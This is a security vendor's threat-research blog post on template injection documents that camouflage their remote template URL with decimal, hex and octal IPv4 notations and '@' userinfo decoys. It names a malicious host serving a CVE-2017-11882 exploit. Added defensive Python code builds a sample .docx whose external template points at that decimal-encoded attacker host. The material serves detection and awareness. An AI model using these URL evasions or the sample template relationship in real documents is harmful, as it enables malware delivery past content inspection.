Menlo Labs provides insights, expertise, context and tools to aid customers on their journey to connect, communicate and collaborate securely without compromise. The collective is made up of elite security researchers that put a spotlight on the threats you know and don’t know about.
Ashwin Vamshi | Oct 05, 2022
The Menlo Labs research team recently published a blog on how weaponized template injection documents work and how to prevent them. Unless they carry specific traces such as a known-malicious URL or exploit markers, these documents often go undetected by security scanners.
As we continued our research into template injection attacks, we came across several weaponized documents that used an interesting camouflage technique to hide the template URL from the naked eye: the documents referenced the remotely hosted template through a decimal IP address or through an obscure URL format.
As we mentioned in our previous post, the attacks are also noteworthy for the following reasons:
This blog details our findings on the camouflaged template injection attacks.
An IPv4 address is usually written in dotted-decimal notation, XXX.XXX.XXX.XXX, but the same 32-bit value can be written in several other notations.
Let’s show the different notations using a google.com IP address, 142.250.199.142 (at the time of this writing):
In addition to the above, there is a 0-optimized dotted-decimal notation, in which zero octets are suppressed or compressed, so the address is written with fewer than four parts and the last part is widened to fill the remaining bytes.
For this example, let’s take a common default gateway address: 192.168.0.1. The list below shows representations in which the 0 in the address is optimized away:
By default, browsers accept most of these notations (binary is the exception): the WHATWG URL parser treats a host whose last label is numeric as an IPv4 literal and reads each part as decimal, octal (leading 0), or hexadecimal (0x prefix). Using such notations can evade file-based content inspection engines that look for a conventionally formatted URL.
Sounds complicated? Interesting? It’s not over yet. Let’s dig into another part of this Pandora’s box.
While the IP address notations already pose a challenge to file-based content inspection engines, obscure URLs make inspection even harder. This method abuses the userinfo subcomponent of the authority in the Uniform Resource Identifier (URI) generic syntax, which is delimited from the host by “@”. With this character, a misleading URI can be built that is still syntactically valid, leading to URI-based semantic attacks. Taking the same google.com example, a misleading URI is https://test@google.com. When this URL is entered in the browser address bar, the browser navigates to google.com.
Here, “@” functions as a delimiter: everything before it (“test”) is userinfo, which is discarded, and the host google.com is contacted. The URL must also use the “://” form so that an authority component is present; without an authority there is no userinfo to abuse.
The same behavior holds for any number of “@” characters; everything up to the last “@” is treated as userinfo:
This can also be combined with octal, hexadecimal, and decimal notations, such as https://test@0x8efac78e and https://@721078158. This turned out to be an interesting experiment for us. We found that, apart from the standard dotted-decimal notation, the octal, hexadecimal, and decimal/DWORD notations were treated as invalid links by most applications, so they were never parsed as URLs at all.
In addition, an attacker can mask the malicious URL behind a benign-looking one. Consider the following URLs as examples:
In all these examples, the URLs resolve to google.com; 192.168.1, 192.168.0.1, and youtube.com sit before the “@”, are treated as userinfo, and are not the hosts that are actually contacted.
The use of browser-supported nonstandard IP notations and a misleading URI acts as camouflage.
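The following is an added example, not code from Menlo Labs, that canonicalises a URL’s host the way a browser does, so the decimal/DWORD, hexadecimal, octal and zero-compressed IPv4 notations and the userinfo (“@”) trick described above all collapse to the address that would really be contacted. The parsing rules follow the WHATWG URL Standard’s IPv4 parser; the sample URLs are constructed from the notations discussed above (google.com and youtube.com appear only as decoy labels before the “@”), and the function names are this example’s own.

```python
"""Canonicalise URL hosts so camouflaged IPv4 literals and userinfo decoys
resolve to the host a browser would contact.

Added example (not Menlo Labs code). Parsing follows the WHATWG URL
Standard's IPv4 parser: a host whose parts are all numbers is an IPv4
literal; each part is hex with a '0x' prefix, octal with a leading '0',
otherwise decimal; the last part fills whatever bytes remain.
"""
from urllib.parse import urlsplit


def _parse_ipv4_number(part: str):
    """Parse one dotted part; return None if it is not a number at all."""
    if part == "":
        return None
    radix = 10
    if len(part) >= 2 and part[:2].lower() == "0x":
        part, radix = part[2:], 16
    elif len(part) >= 2 and part[0] == "0":
        part, radix = part[1:], 8
    if part == "":                      # a bare "0x" or "0" is zero
        return 0
    digits = {10: "0123456789", 8: "01234567",
              16: "0123456789abcdefABCDEF"}[radix]
    if any(ch not in digits for ch in part):
        return None
    return int(part, radix)


def normalize_ipv4_host(host: str):
    """Dotted-decimal form of `host` if a browser would treat it as an IPv4
    literal in any notation (1 to 4 parts), otherwise None."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":   # one trailing dot is tolerated
        parts.pop()
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for part in parts:
        number = _parse_ipv4_number(part)
        if number is None:
            return None
        numbers.append(number)
    # Every part but the last is a single byte; the last part fills the
    # remaining bytes, which is why "192.168.1" and "3232235521" are valid.
    if any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def effective_host(url: str) -> str:
    """Host actually contacted: anything before the last '@' in the
    authority is userinfo and is discarded, then the host is canonicalised."""
    hostname = urlsplit(url).hostname or ""
    return normalize_ipv4_host(hostname) or hostname


def camouflage_indicators(url: str):
    """Reasons a URL should be treated as camouflaged; empty list if none."""
    split = urlsplit(url)
    hostname = split.hostname or ""
    reasons = []
    if "@" in split.netloc:
        reasons.append("userinfo before '@': the text before it is not the host")
    canonical = normalize_ipv4_host(hostname)
    if canonical is not None and canonical != hostname:
        reasons.append(f"non-standard IPv4 notation for {canonical}")
    return reasons


if __name__ == "__main__":
    # Constructed samples built from the notations discussed in the post.
    SAMPLES = [
        "https://test@google.com",         # userinfo decoy
        "https://test@test@google.com",    # several '@': the last one wins
        "https://youtube.com@0x8efac78e",  # benign-looking decoy + hex literal
        "https://users@1806450061",        # decoy + decimal/DWORD literal
        "https://0300.0250.0.01/",         # octal
        "https://192.168.1/",              # zero-compressed
    ]
    for url in SAMPLES:
        print(f"{url:34} -> {effective_host(url):16} {camouflage_indicators(url)}")
```

A content inspection engine that runs `effective_host` before matching URL indicators sees `142.250.199.142` for both `https://0x8efac78e` and `https://youtube.com@0x8efac78e`, which is exactly the equivalence the camouflage relies on engines not noticing.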
An attacker can use the following methods to bypass content inspection engines that check for URLs:
These techniques are not new and have been in use for more than a decade. In September 2020, Trustwave published details citing examples of such URL evasions, including an encoded hexadecimal IP address and a URL semantic attack that masked a shortened URL.
During our research, we identified camouflaged URLs used in weaponized template injection documents.
The templates were hosted in camouflaged URLs that were using the following:
We will share examples of these notations identified in our analysis.
The document we analyzed that used a decimal-notation URL also padded the URL with several “.” and “-” characters as camouflage (see Figure 1).
The details of the file are as follows:
The decimal/DWORD value 1806450061 in the URL is the equivalent of 107.172.61.141 in dotted-decimal format.
Another similar-looking document used the same decimal-notation URL, again padded with “.” and “-” characters. In addition, the attacker crafted a misleading URI semantic attack (see Figure 2).
As explained earlier, “@” functions as a delimiter: “users” is discarded as userinfo and “1806450061” is taken as the host, which resolves to the dotted-decimal address 107.172.61.141.
Now the question is: does this camouflage resolve automatically, without user interaction? The answer is yes.
In both cases described above, simply opening the weaponized document is enough: the application resolves the camouflaged URL and fetches the template from 107.172.61.141. A packet capture taken while one such weaponized document was executed is shown below (see Figure 3).
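As an added example that is not Menlo Labs code, the check below pulls the external attached-template URL out of a .docx and flags the camouflage forms discussed in this post. A template injection document declares its remote template in word/_rels/settings.xml.rels as a Relationship of type …/relationships/attachedTemplate with TargetMode="External", and that Target is fetched when the file is opened. The .docx built here is a constructed minimal sample (only the relationship part, not a complete Word file); its Target reuses the decimal host from the analyzed documents and imitates the “.” and “-” path padding described above, and the function names are this example’s own.

```python
"""Extract the external attached-template URL from a .docx and flag the
userinfo and non-standard IP camouflage forms.

Added example (not Menlo Labs code). The sample document is constructed
in memory and carries only the relationship part that matters here.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RELS_NS_URI = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
SETTINGS_RELS = "word/_rels/settings.xml.rels"

# Plain dotted-decimal: four octets, no leading zeros, no hex, no DWORD.
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
DOTTED_QUAD = re.compile(rf"{OCTET}(?:\.{OCTET}){{3}}")

# Constructed target: decimal/DWORD host behind a "users@" decoy, with
# '.' and '-' padding in the path as in the documents described above.
SAMPLE_TARGET = "https://users@1806450061/-----.....-----/....-....-..../template.dotm"


def build_sample_docx(target: str = SAMPLE_TARGET) -> bytes:
    """Constructed minimal .docx containing only settings.xml.rels."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS_URI}">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" '
        f'Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(SETTINGS_RELS, rels)
    return buf.getvalue()


def external_templates(docx_bytes: bytes):
    """External attachedTemplate targets declared in the document, if any."""
    targets = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if SETTINGS_RELS not in zf.namelist():
            return targets
        root = ET.fromstring(zf.read(SETTINGS_RELS))
    for rel in root.iter(f"{{{RELS_NS_URI}}}Relationship"):
        if (rel.get("Type") == ATTACHED_TEMPLATE
                and rel.get("TargetMode", "Internal") == "External"):
            targets.append(rel.get("Target", ""))
    return targets


def looks_camouflaged(url: str) -> bool:
    """True when the authority carries userinfo ('@') or the host is an
    IPv4 literal written in anything other than plain dotted-decimal."""
    split = urlsplit(url)
    hostname = (split.hostname or "").rstrip(".")
    last_label = hostname.rsplit(".", 1)[-1]
    # To a browser a host whose last label is numeric (or 0x-hex) is an
    # IPv4 literal, whatever the other labels look like.
    ip_literal = last_label.isdigit() or last_label.lower().startswith("0x")
    return "@" in split.netloc or (ip_literal and not DOTTED_QUAD.fullmatch(hostname))


def scan(docx_bytes: bytes):
    """(target, camouflaged) for every external template in the document."""
    return [(t, looks_camouflaged(t)) for t in external_templates(docx_bytes)]


if __name__ == "__main__":
    for target, flagged in scan(build_sample_docx()):
        print(("CAMOUFLAGED " if flagged else "plain       ") + target)
```

The check deliberately keys on the relationship type and TargetMode rather than on the shape of the URL, so a document that pads the Target with dots and dashes, or writes the host as a DWORD, is still surfaced; the decision about whether the host is acceptable is then made on the parsed authority, not on the raw string a signature would see.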
The weaponized documents downloaded a template containing an RTF exploit for CVE-2017-11882, a stack buffer overflow in the Microsoft Office Equation Editor (EQNEDT32.EXE) that leads to remote code execution. Although the vulnerability was patched in November 2017, it continues to be actively exploited.
In our analysis, the RTF exploit templates went on to drop malware such as FormBook, Snake Keylogger, and SmokeLoader.
As explained in our previous article, customers using Menlo’s Cloud Security Platform powered by an Isolation Core™ are protected against template injection attacks by design: the platform opens every document downloaded from the Internet inside the Isolation Core™, away from the user’s endpoint.
Menlo’s Safedoc feature strips out all active content, so the malicious component is removed and the document is converted to a safe version. Policies can also be configured so that every document from the Internet is downloaded as a safe version.
This blog provided details about the different IP address notations and URI semantic attacks that Menlo Labs has seen. Threat actors have taken advantage of browser-supported nonstandard notations and of the userinfo “@” delimiter to craft camouflaged URLs. We showcased weaponized template injection documents that used these techniques, along with “.” and “-” characters as additional camouflage to the naked eye. The attack bypasses some file-based content inspection engines, which treat such URLs as invalid links and never inspect them.
While we observed only a few camouflaged iterations in the template injection attacks, we expect to see more from this Pandora’s box.
Tagged with Awareness, HEAT, Menlo Labs, RBI, Threat Trends, Web Security